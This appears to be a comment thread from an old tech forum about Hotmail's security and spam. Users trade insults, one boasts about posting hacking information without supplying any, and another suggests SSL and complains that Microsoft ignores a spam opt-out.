Re:Informative - More like criminal action actuall

wow - you read my hotmail - an account i dont even have ? - shit are there some good ones there

Loser

RE: BY UNKNOWN

[(unknown)]

Bill: "I'll take internet for 400"
Host: "what do you know, the daily double. Ahem. Here it is; it's encrypted (with end-to-end encryption between HushMail users -- email sent to non-Hush accounts are only sent to Hush's servers unencryped), it's more secure. I'm not a Hush representative, but after using it for a few
months, it's definitely the answer."
*bing*
Susie: "What is the best free email service?"
Host: "Yes! 800 points go to Susie, and that's all for tonight."

Re:Informative - More like criminal action actuall

LOL - You really make me laugh.. try sueing me if I were to post the info on hacking into a personal computer.. What could you do? Sue.. sure.. would you win? Not a chance in hell! You might in your country, but I'm not there am I.. and making the authorities come get me here would be quite the joke ;o)

so, do you?

[steeljaw]

"I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out"

So, do you tell them? Sounds like you could make a couple bucks out of this..

How would SSL help?

[decaying]

Perhaps SSL would help by making it a secure system?

Perhaps encrypting all traffic between client and server would make it a wee bit more secure?

This would also give some 'state' (if handled properly) to the hotmail session, and not allow you to jump to someone else's mailbox/email.

... but moving to a secure (SSL) site would be a major investment, even by MS's standards and with .NET coming they would hardly think it worth while.

Re: BY UNKNOWN

your fucking hilarious

Re: Hotmail hacked!

[xXgeneric+nicknameXx]

shuddup sissy

Re:Informative - More like criminal action actuall

[blair1q]

Dude, you're allowed to walk down the street for free, I can't believe you'd bitch about the cops pushing flyers in your pockets and searching you for doobs on every corner.

The account isn't free. It's got banner ads all over it. That's my eyeball time purchased by Microsoft's sponsors. And they count the page hits for their own advertising. That's the price paid for my account. I also to spend my valuable time observing, and in some cases stopping GIF animations and Flash4 loops on, those ads. But I have the legal right to stop them from mixing their spam with my email.

Microsoft is breaking the law. They offered a box to check to opt out of spam from all sources, and I checked it. They know the law. They choose to flout it, going so far as to design software to get around all attempts to block their spam, and to train customer-support personnel in evading the issue and delaying its resolution. My indignation is completely justified.

It's not any less a crime just because some people think it's okay to be victimized. I expect people to disagree with that. I expect people to vote against it. I expect some people still to elect fascists and communists into power in their countries. No issue is 100%.

Microsoft is committing this crime against millions of us, when all they have to do is pay attention to that checkbox and they won't be committing that crime against any of us. What's so hard about that?

--Blair